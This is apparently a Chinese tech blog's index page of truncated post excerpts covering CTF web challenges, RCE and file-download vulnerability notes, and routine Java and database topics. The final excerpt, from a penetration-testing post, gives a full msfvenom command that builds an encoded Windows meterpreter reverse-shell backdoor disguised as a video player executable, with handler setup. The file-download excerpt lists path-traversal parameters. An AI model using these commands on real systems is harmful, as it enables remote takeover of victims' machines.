Feb182022
CTFHub_2020-BDJCTF-Web-easy_search(.swp备份文件源码泄露、SSI注入)
进入场景,显示如下
简单测试一下,没有sql注入
根据题目easy search提示,扫描一下,发现index.php.swp文件(注意及时更新扫描字典)
.swp备份文件源码泄露
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$...阅读全文
抢沙发
Feb112022
数据库读写分离架构设计:MySQL主从复制与读写分离中间件选型对比
数据库读写分离架构设计:MySQL主从复制与读写分离中间件选型对比
引言
随着互联网应用的快速发展,数据库系统面临的并发访问压力日益增大。在高并发场景下,单一数据库实例往往难以支撑大量读写请求,尤其是读操作通常远多于写操作。为了提升数据库的性能和可扩展性,读写分离(Read-Write Splitting)成为一种广泛应用的架构设计模式。
读写分离的核心思想是将数据库的读操作和写操作分...阅读全文
Jan232022
在Linux中安装和配置Tomcat服务器
Tomcat是一个开源的Java Servlet容器,用于运行Java的Web应用程序。它是Apache软件基金会的一部分,并且被广泛使用,特别是在Linux服务器上。本教程将向您展示如何在Linux系统上安装和配置Tomcat服务器。
步骤1:下载Tomcat
首先,您需要从Tomcat的官方网站(https://tomcat.apache.org/)上下载Tomcat的最新稳定版本。选择适合您环境的tar.gz文件。
wget https://downloads.apache.org/t...阅读全文
Jan182022
30:WEB漏洞-RCE代码及命令执行漏洞全解
思维导图
在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。
代码执行演示
test.php脚本代码
eval()函数会将传入的字符串当做代码来执行,若传入phpinfo();则会执行,显示如下
传入echo...阅读全文
Jan172022
85:CTF夺旗-JAVA考点反编译&XXE&反序列化
思维导图
Java常考点及出题思路
考点技术:xxe,spel表达式,反序列化,文件安全,最新框架插件漏洞等
设法间接给出源码或相关配置提示文件,间接性源码或直接源码体现等形式
CTF中常见Web源码泄露总结(参考:https://www.cnblogs.com/xishaonian/p/7628153.html)
.ng源码泄露
git源码泄露
.Ds_store文件泄漏
网站备份压缩文件
SVN导致文件泄露
WEB-INF/web. xml泄露
CVS泄漏
Java必备...阅读全文
Jan162022
MyBatis使用注解
在MyBatis中,除了使用XML映射文件来定义SQL语句和映射关系外,还可以使用注解来简化配置。以下是在MyBatis中使用注解的基本步骤:
添加依赖
确保你的项目中已经添加了MyBatis的依赖。如果你使用Maven,可以在pom.xml文件中添加以下依赖:
<dependency>
<groupId>org.mybatis</groupId>
<artifactId>mybatis</artifactId>
<version>你...阅读全文
Jan112022
Flink 使用之 MySQL CDC
MySQL(即 Relational Database Management System,RDBMS)是一种常见的关系型数据库管理系统,在很多应用场景中都扮演着重要角色。随着数据量和处理需求的不断增长,实时和准实时的数据处理变得越来越重要。Apache Flink 是一个分布式流处理框架,支持低延迟和高吞吐量的实时数据处理任务。在本篇博客中,我们将介绍如何使用 Flink 中的 MySQL CDC 功能来实现实时数据处理。
什么是 MyS...阅读全文
Jan072022
学习使用Maven进行项目构建
Maven是一个强大的项目构建工具,它提供了一套标准化的项目结构和构建流程,能够简化项目的管理和构建过程。本文将介绍如何使用Maven进行项目构建,以及一些常见的Maven功能和用法。
安装Maven
首先,你需要在本地安装Maven。你可以从Maven官方网站下载Maven的安装包,并按照官方文档的指引进行安装。
安装完成后,你可以在命令行中输入以下命令来验证Maven是否成功安装:
mvn -v
如果看...阅读全文
Dec272021
32:WEB漏洞-文件操作之文件下载读取全解
思维导图
知识点
文件下载,读取
原理,检测,利用,修复等
漏洞发现
从文件名,参数值,目录符号等
read.xxx?filename=
down.xxx?filename=
readfile.xxx?file=
downfile.xxx?file=
../ ..\ .\ ./ 等
%00 ? %23 %20 .等
&readpath= &filepath= &path= &inputfile= &url= &data= &readfile= &menu= META-INF= WEB-INF
1.文件被解析,则是...阅读全文
Dec212021
渗透测试之后门软件
1. 制作Windows恶意软件
1.1 使用msfvenom生成后门木马
制作后门程序
sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.142.135 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜影音.exe
、
msf启动handler监听后门程序,
use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.14...阅读全文